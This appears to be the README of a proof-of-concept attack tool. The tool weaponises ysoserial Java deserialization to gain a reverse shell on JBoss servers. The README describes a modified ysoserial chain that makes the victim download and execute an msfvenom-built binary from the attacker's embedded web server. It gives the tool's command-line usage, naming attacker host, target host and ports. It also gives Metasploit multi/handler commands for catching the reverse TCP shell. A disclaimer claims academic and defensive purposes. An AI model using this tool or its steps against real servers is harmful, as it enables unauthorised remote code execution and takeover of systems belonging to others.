A proof-of-concept tool which weaponizes frohoff's original ysoserial code to gain a remote shell.
This tool builds upon the proof-of-concept ysoserial by Chris Frohoff (https://github.com/frohoff/ysoserial) and exploits the vulnerability, using Metasploit Framework tools to generate a malicious binary and an embedded web server to transfer the payload to the victim. A slightly modified version of ysoserial is used to download and execute the binary on the victim's side.
Note: This tool is still in an early stage of development, and many features have not yet been implemented. Only the JBoss platform is currently exploitable.
This software has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Project maintainers are not responsible or liable for misuse of the software. Use responsibly.
```
$ java -jar JBossExploit.jar -help
usage: java -jar jbossexploit.jar -lhost <host> -mport <port> -rhost
       <host> -rport <port> -srvport <port>
 -help              print this message
 -lhost <host>      IP Address of Attacking Machine
 -mport <port>      Port on which local hanadler is listening for a reverse
                    TCP shell
 -rhost <host>      Target Hostname or IP Address
 -rport <port>      Remote JBoss Port
 -srvport <port>    Port for local HTTP server
```
Coming soon.
- Metasploit Framework -- You must have a listener running in msfconsole before running this exploit. Example:
  ```
  $ msfconsole
  msf > use exploit/multi/handler
  msf exploit(handler) > set payload linux/x86/shell/reverse_tcp
  msf exploit(handler) > set LHOST <local ip>
  msf exploit(handler) > set LPORT <local port>
  msf exploit(handler) > exploit
  ```
- msfvenom must be installed and available in your PATH. This command is used to generate the reverse shell payload.
- Download the latest jar from the "releases" section.
- Fork the repo
- Create new feature branch
- Commit changes
- Push to branch
- Create Pull Request